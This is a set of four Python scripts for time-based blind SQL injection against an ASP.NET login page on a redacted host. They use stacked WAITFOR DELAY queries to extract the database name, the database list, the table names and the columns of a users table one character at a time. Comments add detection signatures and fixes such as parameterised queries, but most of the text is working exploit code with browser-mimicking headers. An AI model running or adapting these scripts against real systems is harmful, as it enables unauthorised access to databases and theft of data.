sqli (mssql)
import requests, time, string
# Login endpoint every probe below is POSTed to. From the server side this
# traffic looks like a long burst of failed logins from one client against
# one form, which is the first thing a defender can alert on.
URL = "http://redacted.com/login.aspx"
# Candidate characters tried one position at a time. The linked page
# describes MySQL identifier rules even though the queries in this file
# target SQL Server (sys.columns / WAITFOR DELAY); any character outside
# this set ends the extraction of a name early.
charsets = string.ascii_letters + string.digits + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
# Browser-like headers copied from an intercepted request (the "burp0_"
# prefix suggests a Burp "copy as requests" export). Nothing here is
# required for the injection itself; it only makes the traffic blend in.
burp0_headers = {
    "Cache-Control": "max-age=0",
    "Accept-Language": "en-US,en;q=0.9",
    "Origin": "http://redacted.com",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Referer": "http://redacted.com/login.aspx",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}
def send(payload):
    """Submit one login attempt with *payload* appended to the username and
    return the wall-clock round-trip time in seconds.

    The response body is discarded: latency is the only signal this helper
    exposes, so the caller cannot distinguish an injected server-side delay
    from an ordinary slow response.
    """
    data = {
        # ASP.NET WebForms state fields captured from the original form.
        "__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
        "__VIEWSTATEGENERATOR": "C2EE9ABB",
        "__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
        # Injection point: the payload is concatenated straight after "admin",
        # i.e. the application must be building its SQL from this field.
        "redacted$redacted$redactedusername": "admin" + payload,
        "redacted$redacted$redactedpassword": "admin",
        "redacted$redacted$redactedbutton": "Login",
    }
    start = time.time()
    # No timeout is passed, so a connection that never answers blocks here.
    requests.post(URL, headers=burp0_headers, data=data)
    return time.time() - start
# Recover the column names of [webapp].dbo.users one character at a time.
# Each probe makes the server pause 10 s only when the guessed character is
# right; a response slower than 9 s is read as a hit.
#
# Defender note: the request body carries the literal "WAITFOR DELAY" and a
# stacked-query prefix ("'; IF ..."), and the login page answers a run of
# requests in ~10 s each -- both are plain signatures for a WAF or log rule.
# Using a parameterised query for the login lookup removes the injection
# point altogether.
col_index = 0
while True:
    extracted = ""
    pos = 1
    found_any = False
    while True:
        found_char = False
        for c in charsets:
            payload = (
                f"'; IF (SELECT SUBSTRING(name,{pos},1) "
                f"FROM [webapp].sys.columns " # [dbname].sys.columns
                f"WHERE object_id = OBJECT_ID('[webapp].dbo.users') " # [dbname].dbo.column_name
                f"ORDER BY name "
                f"OFFSET {col_index} ROWS FETCH NEXT 1 ROWS ONLY)='{c}' "
                f"WAITFOR DELAY '0:0:10'--"
            )
            # Latency is the only oracle: any other cause of a >9 s response
            # (load, network) is indistinguishable from a match.
            if send(payload) > 9:
                extracted += c
                pos += 1
                found_char = True
                found_any = True
                print(f"[col {col_index}] {extracted}")
                break
        # No candidate matched at this position: the name is complete, or it
        # contains a character outside `charsets`.
        if not found_char:
            break
    # Nothing matched even at position 1 -- presumably OFFSET ran past the
    # last column, so there are no more names to read.
    if not found_any:
        break
    col_index += 1
import requests, time, string
# Login endpoint every probe below is POSTed to; each probe is one more
# failed login against the same form from the same client.
URL = "http://redacted.com/login.aspx"
# Candidate characters tried one position at a time (digits first here,
# unlike the sibling scripts). The linked page describes MySQL identifier
# rules even though the query below targets SQL Server (db_name(),
# WAITFOR DELAY).
charsets = string.digits + string.ascii_letters + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
# Browser-like headers copied from an intercepted request (the "burp0_"
# prefix suggests a Burp "copy as requests" export).
burp0_headers = {
    "Cache-Control": "max-age=0",
    "Accept-Language": "en-US,en;q=0.9",
    "Origin": "http://redacted.com",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Referer": "http://redacted.com/login.aspx",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}
# Recover DB_NAME() one character at a time using response latency.
# Unlike the sibling scripts there is no send() helper; the form data is
# rebuilt and posted inline for every guess.
i = 1
extracted_char = ""
stop = False
while True:
    found = False
    for char in charsets:
        # Stacked query: the 10 s pause only fires when the guess is right.
        payload = f"'; IF (SELECT substring(db_name(),{i},1))='{char}' WAITFOR DELAY '0:0:10'--"
        burp0_data = {
            # ASP.NET WebForms state fields captured from the original form.
            "__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
            "__VIEWSTATEGENERATOR": "C2EE9ABB",
            "__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
            # Injection point: the payload is concatenated after "admin".
            "redacted$redacted$redactedusername": "admin" + payload,
            "redacted$redacted$redactedpassword": "admin",
            "redacted$redacted$redactedbutton": "Login",
        }
        start = time.time()
        # No timeout is passed, so an unanswered request blocks here.
        res = requests.post(URL, headers=burp0_headers, data=burp0_data)
        # A >9 s response is read as a hit; any other slow response looks
        # the same to this check.
        if time.time() - start > 9:
            extracted_char += char
            print(f"pos {i}: {extracted_char}")
            i += 1
            found = True
            break
        # The script expects the raw ADO.NET exception text to appear in the
        # page on a SQL error. If the application really echoes that, the
        # verbose error page is a finding in its own right: production
        # ASP.NET sites should serve a generic error (customErrors on) so
        # database internals never reach the client.
        elif 'System.Data.SqlClient.SqlException (0x80131904)' in res.text:
            print(f'hello, {i}, {char}, {res.text}')
            stop = True
            break
    # No candidate matched at this position: the name is complete or holds a
    # character outside `charsets`.
    if not found:
        # i is bumped here but the loop exits on the next line, so the
        # increment has no effect on anything that follows.
        i += 1
        break
    if stop:
        break
import requests, time, string
# Login endpoint every probe below is POSTed to; each probe is one more
# failed login against the same form from the same client.
URL = "http://redacted.com/login.aspx"
# Candidate characters tried one position at a time. The linked page
# describes MySQL identifier rules even though the query below targets
# SQL Server (sys.databases / WAITFOR DELAY); a name containing a character
# outside this set is cut short.
charsets = string.ascii_letters + string.digits + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
# Browser-like headers copied from an intercepted request (the "burp0_"
# prefix suggests a Burp "copy as requests" export).
burp0_headers = {
    "Cache-Control": "max-age=0",
    "Accept-Language": "en-US,en;q=0.9",
    "Origin": "http://redacted.com",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Referer": "http://redacted.com/login.aspx",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}
def send(payload):
    """Submit one login attempt with *payload* appended to the username and
    return the wall-clock round-trip time in seconds.

    The response body is discarded; latency is the only signal exposed, so
    an injected delay and an ordinarily slow response look identical.
    """
    data = {
        # ASP.NET WebForms state fields captured from the original form.
        "__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
        "__VIEWSTATEGENERATOR": "C2EE9ABB",
        "__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
        # Injection point: the payload is concatenated straight after "admin".
        "redacted$redacted$redactedusername": "admin" + payload,
        "redacted$redacted$redactedpassword": "admin",
        "redacted$redacted$redactedbutton": "Login",
    }
    start = time.time()
    # No timeout is passed, so an unanswered request blocks here.
    requests.post(URL, headers=burp0_headers, data=data)
    return time.time() - start
# Recover the names in sys.databases one character at a time. Each probe
# makes the server pause 10 s only when the guessed character is right; a
# response slower than 9 s is read as a hit.
#
# Defender note: sys.databases being readable from the login's DB account is
# a least-privilege gap on top of the injection itself -- the login user
# needs no catalog visibility beyond its own database. The "WAITFOR DELAY"
# literal and the ~10 s login responses are the observable signatures.
db_index = 0
while True:
    extracted = ""
    pos = 1
    found_any = False
    while True:
        found_char = False
        for c in charsets:
            payload = (
                f"'; IF (SELECT SUBSTRING(name,{pos},1) "
                f"FROM sys.databases "
                f"ORDER BY name "
                f"OFFSET {db_index} ROWS FETCH NEXT 1 ROWS ONLY)='{c}' "
                f"WAITFOR DELAY '0:0:10'--"
            )
            # Latency is the only oracle; any other >9 s response is
            # indistinguishable from a match.
            if send(payload) > 9:
                extracted += c
                pos += 1
                found_char = True
                found_any = True
                print(f"[db {db_index}] {extracted}")
                break
        # No candidate matched at this position: the name is complete, or it
        # contains a character outside `charsets`.
        if not found_char:
            break
    # Nothing matched at position 1 -- presumably OFFSET ran past the last
    # row, so stop.
    if not found_any:
        break
    db_index += 1
import requests, time, string
# Login endpoint every probe below is POSTed to; each probe is one more
# failed login against the same form from the same client.
URL = "http://redacted.com/login.aspx"
# Candidate characters tried one position at a time. The linked page
# describes MySQL identifier rules even though the query below targets
# SQL Server (sys.tables / WAITFOR DELAY); a name containing a character
# outside this set is cut short.
charsets = string.ascii_letters + string.digits + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
# Browser-like headers copied from an intercepted request (the "burp0_"
# prefix suggests a Burp "copy as requests" export).
burp0_headers = {
    "Cache-Control": "max-age=0",
    "Accept-Language": "en-US,en;q=0.9",
    "Origin": "http://redacted.com",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Referer": "http://redacted.com/login.aspx",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}
def send(payload):
    """Submit one login attempt with *payload* appended to the username and
    return the wall-clock round-trip time in seconds.

    The response body is discarded; latency is the only signal exposed, so
    an injected delay and an ordinarily slow response look identical.
    """
    data = {
        # ASP.NET WebForms state fields captured from the original form.
        "__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
        "__VIEWSTATEGENERATOR": "C2EE9ABB",
        "__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
        # Injection point: the payload is concatenated straight after "admin".
        "redacted$redacted$redactedusername": "admin" + payload,
        "redacted$redacted$redactedpassword": "admin",
        "redacted$redacted$redactedbutton": "Login",
    }
    start = time.time()
    # No timeout is passed, so an unanswered request blocks here.
    requests.post(URL, headers=burp0_headers, data=data)
    return time.time() - start
# Recover the table names of [webapp] one character at a time. Each probe
# makes the server pause 10 s only when the guessed character is right; a
# response slower than 9 s is read as a hit.
#
# Defender note: the same controls that stop the sibling scripts apply --
# a parameterised login query removes the injection point, and the
# "WAITFOR DELAY" literal plus a run of ~10 s login responses is the
# signature to alert on.
table_index = 0
while True:
    extracted = ""
    pos = 1
    found_any = False
    while True:
        found_char = False
        for c in charsets:
            payload = (
                f"'; IF (SELECT SUBSTRING(name,{pos},1) "
                f"FROM [webapp].sys.tables " # dbname
                f"ORDER BY name "
                f"OFFSET {table_index} ROWS FETCH NEXT 1 ROWS ONLY)='{c}' "
                f"WAITFOR DELAY '0:0:10'--"
            )
            # Latency is the only oracle; any other >9 s response is
            # indistinguishable from a match.
            if send(payload) > 9:
                extracted += c
                pos += 1
                found_char = True
                found_any = True
                print(f"[table {table_index}] {extracted}")
                break
        # No candidate matched at this position: the name is complete, or it
        # contains a character outside `charsets`.
        if not found_char:
            break
    # Nothing matched at position 1 -- presumably OFFSET ran past the last
    # row, so stop.
    if not found_any:
        break
    table_index += 1